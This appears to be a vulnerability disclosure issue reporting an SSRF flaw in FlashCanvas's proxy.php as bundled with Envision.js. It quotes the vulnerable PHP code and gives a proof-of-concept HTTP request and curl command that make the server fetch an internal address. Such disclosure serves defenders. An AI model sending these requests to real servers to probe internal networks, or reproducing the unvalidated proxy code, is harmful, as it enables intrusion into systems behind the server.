[Vuln] SSRF vulnerability in readile Function of proxy.php File (Envision.js latest version) #37
Description
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.
Impact version: latest
Test with PHP 7.2
The vulnerable code is located in the readfile function of the lib/FlashCanvas/bin/proxy.php file, which does not perform sufficient checksumming of the url parameter, resulting in a taint introduced from the $_GET['url'] variable, and When the extension_loaded('curl') condition is not met, it enters the taint function readfile, which then sends a request to the URL specified by the url parameter, eventually leading to an SSRF vulnerability.
......
$url = str_replace($search, $replace, $_GET['url']);
// Disable compression
header('Content-Encoding: none');
// Load and output the file
if (extension_loaded('curl')) {
// Use cURL extension
$ch = curl_init($url);
curl_exec($ch);
curl_close($ch);
} else {
// Use the http:// wrapper
readfile($url);
}
......Because the url parameter is unrestricted, it is also possible to use the server-side to send requests, such as probing intranet web services. The corresponding PoC is as follows
GET /proxy.php?url=http://172.16.119.1/proxypoc HTTP/1.1
Host: 172.16.119.1
Referer: #/flash123canvas.swf
Connection: close
You can also use the following curl command to verify the vulnerability
curl -i -s -k -X $'GET' \
-H $'Host: 172.16.119.1:81' -H $'Referer: #/flash123canvas.swf' -H $'Connection: close' \
$'http://172.16.119.1:81/proxy.php?url=http://172.16.119.1/readfilepoc'
